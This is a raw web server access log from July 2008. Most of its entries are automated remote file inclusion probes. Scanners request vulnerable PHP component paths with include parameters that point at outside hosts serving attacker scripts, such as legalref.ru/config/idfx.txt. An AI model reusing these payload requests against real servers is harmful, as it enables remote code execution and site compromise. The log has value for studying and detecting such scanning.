81.0.228.184 - - [31/Jul/2008:00:18:07 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
81.0.228.184 - - [31/Jul/2008:00:18:07 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
81.0.228.184 - - [31/Jul/2008:00:18:07 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
66.249.70.131 - - [31/Jul/2008:00:18:08 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3118 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.205.68.170 - - [31/Jul/2008:00:18:44 -0500] "GET /logs//dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://theimageguide.com/uploads/id2.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
67.205.68.170 - - [31/Jul/2008:00:18:44 -0500] "GET //dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://theimageguide.com/uploads/id2.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
74.54.108.98 - - [31/Jul/2008:00:19:06 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
74.54.108.98 - - [31/Jul/2008:00:19:06 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
74.54.108.98 - - [31/Jul/2008:00:19:06 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
74.54.108.98 - - [31/Jul/2008:00:19:06 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
81.0.228.184 - - [31/Jul/2008:00:19:16 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
81.0.228.184 - - [31/Jul/2008:00:19:16 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
77.235.37.163 - - [31/Jul/2008:00:19:19 -0500] "GET /logs//dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
77.235.37.163 - - [31/Jul/2008:00:19:19 -0500] "GET //dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
81.0.228.184 - - [31/Jul/2008:00:19:54 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
81.0.228.184 - - [31/Jul/2008:00:19:54 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
74.54.108.98 - - [31/Jul/2008:00:21:15 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
74.54.108.98 - - [31/Jul/2008:00:21:15 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
81.0.228.184 - - [31/Jul/2008:00:21:57 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.0.228.184 - - [31/Jul/2008:00:21:59 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.0.228.184 - - [31/Jul/2008:00:21:59 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.0.228.184 - - [31/Jul/2008:00:21:59 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.15.186.5 - - [31/Jul/2008:00:22:46 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
67.15.186.5 - - [31/Jul/2008:00:22:46 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
216.180.241.37 - - [31/Jul/2008:00:27:58 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
216.180.241.37 - - [31/Jul/2008:00:27:59 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
210.245.166.92 - - [31/Jul/2008:00:28:07 -0500] "GET /logs/errors.php?error=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:00:28:07 -0500] "GET /errors.php?error=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.33.84.163 - - [31/Jul/2008:00:28:19 -0500] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.33.84.163 - - [31/Jul/2008:00:28:19 -0500] "GET //?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
213.33.84.163 - - [31/Jul/2008:00:28:20 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 200 93420 "-""libwww-perl/5.805"
74.52.139.226 - - [31/Jul/2008:00:32:50 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
74.52.139.226 - - [31/Jul/2008:00:32:50 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
213.33.84.163 - - [31/Jul/2008:00:32:54 -0500] "GET /logs/access_log.1210291200//?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
200.146.61.130 - - [31/Jul/2008:00:33:18 -0500] "GET /errors.php?error=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:33:18 -0500] "GET /logs/errors.php?error=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.113.203.55 - - [31/Jul/2008:00:33:57 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bpellican420.250free.com/idwi.txt?? HTTP/1.1" 404 318 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
210.113.203.55 - - [31/Jul/2008:00:33:57 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bpellican420.250free.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
210.113.203.55 - - [31/Jul/2008:00:33:57 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bpellican420.250free.com/idwi.txt?? HTTP/1.1" 404 323 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
210.113.203.55 - - [31/Jul/2008:00:33:57 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://bpellican420.250free.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
210.245.166.92 - - [31/Jul/2008:00:34:31 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:00:34:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
201.36.250.17 - - [31/Jul/2008:00:36:49 -0500] "GET /logs//errors.php?error=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
201.36.250.17 - - [31/Jul/2008:00:36:49 -0500] "GET //errors.php?error=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.800"
194.79.75.195 - - [31/Jul/2008:00:37:10 -0500] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.g8articles.com/update???? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
194.79.75.195 - - [31/Jul/2008:00:37:10 -0500] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.g8articles.com/update???? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
194.79.75.195 - - [31/Jul/2008:00:37:10 -0500] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.g8articles.com/update???? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
194.79.75.195 - - [31/Jul/2008:00:37:10 -0500] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.g8articles.com/update???? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
85.10.128.148 - - [31/Jul/2008:00:37:59 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
85.10.128.148 - - [31/Jul/2008:00:37:59 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
85.10.128.148 - - [31/Jul/2008:00:38:04 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
85.10.128.148 - - [31/Jul/2008:00:38:04 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
200.146.61.130 - - [31/Jul/2008:00:38:48 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:48 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:51 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:52 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:52 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:53 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:55 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:55 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:57 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
200.146.61.130 - - [31/Jul/2008:00:38:58 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
210.113.203.55 - - [31/Jul/2008:00:40:12 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
210.113.203.55 - - [31/Jul/2008:00:40:12 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
210.113.203.55 - - [31/Jul/2008:00:40:13 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
210.113.203.55 - - [31/Jul/2008:00:40:13 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
80.67.26.157 - - [31/Jul/2008:00:40:19 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:00:40:19 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
69.93.189.130 - - [31/Jul/2008:00:40:29 -0500] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.93.189.130 - - [31/Jul/2008:00:40:29 -0500] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
85.214.59.54 - - [31/Jul/2008:00:40:39 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.59.54 - - [31/Jul/2008:00:40:40 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
195.93.201.102 - - [31/Jul/2008:00:40:48 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:00:40:49 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.19.81.18 - - [31/Jul/2008:00:42:26 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
67.19.81.18 - - [31/Jul/2008:00:42:26 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
67.19.81.18 - - [31/Jul/2008:00:42:31 -0500] "GET /logs//includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
67.19.81.18 - - [31/Jul/2008:00:42:32 -0500] "GET //includes/kb_constants.php?module_root_path=%22Base%22http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
218.188.197.136 - - [31/Jul/2008:00:43:42 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
218.188.197.136 - - [31/Jul/2008:00:43:43 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
210.113.203.55 - - [31/Jul/2008:00:44:16 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
210.113.203.55 - - [31/Jul/2008:00:44:16 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 345 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
210.113.203.55 - - [31/Jul/2008:00:44:16 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 318 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
210.113.203.55 - - [31/Jul/2008:00:44:16 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://arabhack.fateback.com/idwi.txt?? HTTP/1.1" 404 323 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
83.12.119.178 - - [31/Jul/2008:00:48:34 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
83.12.119.178 - - [31/Jul/2008:00:48:42 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
83.12.119.178 - - [31/Jul/2008:00:48:51 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
81.177.3.99 - - [31/Jul/2008:00:55:09 -0500] "GET /logs/access_log.1215043200/?sourcedir=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.813"
81.177.3.99 - - [31/Jul/2008:00:55:09 -0500] "GET /?sourcedir=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.813"
81.177.3.99 - - [31/Jul/2008:00:58:26 -0500] "GET /logs/?sourcedir=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 200 44885 "-""libwww-perl/5.813"
195.93.201.102 - - [31/Jul/2008:00:58:33 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:00:58:34 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.67.26.157 - - [31/Jul/2008:00:58:58 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:00:58:59 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
74.53.240.146 - - [31/Jul/2008:01:00:17 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://hades.pdg.pl/VooPrivateStuff/respone.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
88.84.151.157 - - [31/Jul/2008:01:02:31 -0500] "GET /logs//hioxBannerRotate.php?hm=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
88.84.151.157 - - [31/Jul/2008:01:02:31 -0500] "GET //hioxBannerRotate.php?hm=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
216.246.46.184 - - [31/Jul/2008:01:04:15 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
216.246.46.184 - - [31/Jul/2008:01:04:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
82.194.67.123 - - [31/Jul/2008:01:04:34 -0500] "GET /logs//hioxBannerRotate.php?hm=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:04:34 -0500] "GET /logs//hioxBannerRotate.php?hm=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:04:34 -0500] "GET //hioxBannerRotate.php?hm=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
82.194.67.123 - - [31/Jul/2008:01:04:34 -0500] "GET //hioxBannerRotate.php?hm=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
89.111.173.117 - - [31/Jul/2008:01:04:50 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.111.173.117 - - [31/Jul/2008:01:04:50 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.111.173.117 - - [31/Jul/2008:01:04:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
89.111.173.117 - - [31/Jul/2008:01:04:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
195.34.78.106 - - [31/Jul/2008:01:08:57 -0500] "GET /logs/administrator\\components\\com_dbquery\\classes\\DBQ\\admin\\common.class.phphttp://www.apnic.net/index.html? HTTP/1.0" 404 379 "-""Mozilla/5.0"
216.246.46.184 - - [31/Jul/2008:01:11:30 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
216.246.46.184 - - [31/Jul/2008:01:11:30 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
205.234.232.146 - - [31/Jul/2008:01:13:17 -0500] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.814"
205.234.232.146 - - [31/Jul/2008:01:13:17 -0500] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.814"
85.214.59.54 - - [31/Jul/2008:01:13:33 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.59.54 - - [31/Jul/2008:01:13:33 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
64.246.52.46 - - [31/Jul/2008:01:14:46 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:14:47 -0500] "GET //include/admin.lib.inc.php?site_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
83.170.114.48 - - [31/Jul/2008:01:15:00 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
83.170.114.48 - - [31/Jul/2008:01:15:00 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.94.30.30 - - [31/Jul/2008:01:17:32 -0500] "GET /logs/header.php?prefix=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.94.30.30 - - [31/Jul/2008:01:17:32 -0500] "GET /header.php?prefix=http://www.myluxaeterna.co.uk/id???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:01:18:13 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:01:18:13 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:01:18:13 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.246.52.46 - - [31/Jul/2008:01:18:36 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
64.246.52.46 - - [31/Jul/2008:01:18:36 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
74.53.240.146 - - [31/Jul/2008:01:19:11 -0500] "GET /logs/bughttp://legalref.ru/config/idscan.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
74.53.240.146 - - [31/Jul/2008:01:19:11 -0500] "GET /bughttp://legalref.ru/config/idscan.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.214.44.28 - - [31/Jul/2008:01:19:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
